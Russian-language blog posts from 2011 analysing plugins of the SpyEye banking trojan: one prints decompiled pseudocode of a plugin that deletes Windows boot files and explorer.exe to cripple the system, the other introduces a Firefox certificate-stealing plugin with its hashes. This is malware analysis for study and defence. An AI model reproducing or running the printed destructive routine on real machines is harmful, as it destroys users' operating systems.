суббота, 17 сентября 2011 г.

Часть 2: SpyEye и plugin.dll




Наверняка разработка этого плагина велась под лозунгом: "Не наврежу, но нагажу" =) Особо тут смотреть не на что, но да все равно








MD5: 20f73f9765e592960f3f373788560ce4
SHA1: bf4e2c0f858210f3a4fcd74034bf87d1fefb915a
SHA256: ee8afff4b7d8cb851fc893c1913bfe56b89c11864be6faad561ae7947cf7bff6
signed int __cdecl Start()
{
  unsigned int index; // edi@1
  const CHAR *fName; // esi@2
  LPCSTR filesTable; // [sp+8h] [bp-18h]@1
  int v4; // [sp+Ch] [bp-14h]@1
  int v5; // [sp+10h] [bp-10h]@1
  int v6; // [sp+14h] [bp-Ch]@1
  int v7; // [sp+18h] [bp-8h]@1
  int v8; // [sp+1Ch] [bp-4h]@1

  filesTable = "c:\\ntldr";
  v4 = (int)"c:\\ntdetect.com";
  v5 = (int)"c:\\bootmgr";
  v6 = (int)"c:\\loadmgr";
  v7 = (int)"c:\\windows\\explorer.exe";
  v8 = (int)"c:\\osloader.exe";
  index = 0;
  do
  {
    fName = (&filesTable)[4 * index];
    SetFileAttributesA((&filesTable)[4 * index], FILE_ATTRIBUTE_NORMAL);
    DeleteFileA(fName);
    MoveFileExA(fName, "c:\\boots", 4u);
    ++index;
  }
  while ( index < 6 );
  return 1;
}

Плагин тупо пытается уничтожить файло чтобы нарушить нормальную работу OS

пятница, 16 сентября 2011 г.

Часть 1: SpyEye и FireFox (plugin ffcertcrabber.dll)

SpyEye(Pincav) - известный хакерский тулкит, предназначеный для кражи персональных данных , паролей к банковским системам, вообщем 1001 способ нечестного отъема денег =). Только с начала 2011 года с использованием SpyEye было украдено более чем 3,2$ миллиона, только одной из групп =) От как, ну мы оставим эти цифры забугорным и отчественным аналитикам да статистам, а займемся мы тем , что будем понемногу реверсить код этого трояна и его плагинов.

ffcertcrabber.dll - Крадем сертификаты FireFox
Размер: 10240 байт
Дата создания: 22.05.11
Источник: www.kernelmode.info
Virustotal: www.virustotal.com
MD5- 190339a245f2b3684fd2ef0cf0515d0c
SHA1 - 3347e9ccd0a4cec7bd8c86fdf6f39592f430d311
SHA256 - 73e22ebab4f1fe5dea1d4d45af9138b78cdf4a755c0483058ffa01584e57886a
RIPEMD160 - 0f1e75db328846ca505f2c58805f08dae7566225


Т.к базовая комплектация Spyeye занимается только граббингом сертификатов из криптохранилища Windows  в состав трояна был добавлен плагин для похищения сертификатов из браузера FireFox.

Плагином экспортируется 7 функций, страндартно для SpyEye , нам более всего интересно будет посмотреть функцию Start, т.к. тут будет идти самая работа.  Вызов функции инициируется командой от gate'а главной панели управления. Вызов происходит в отдельном потоке.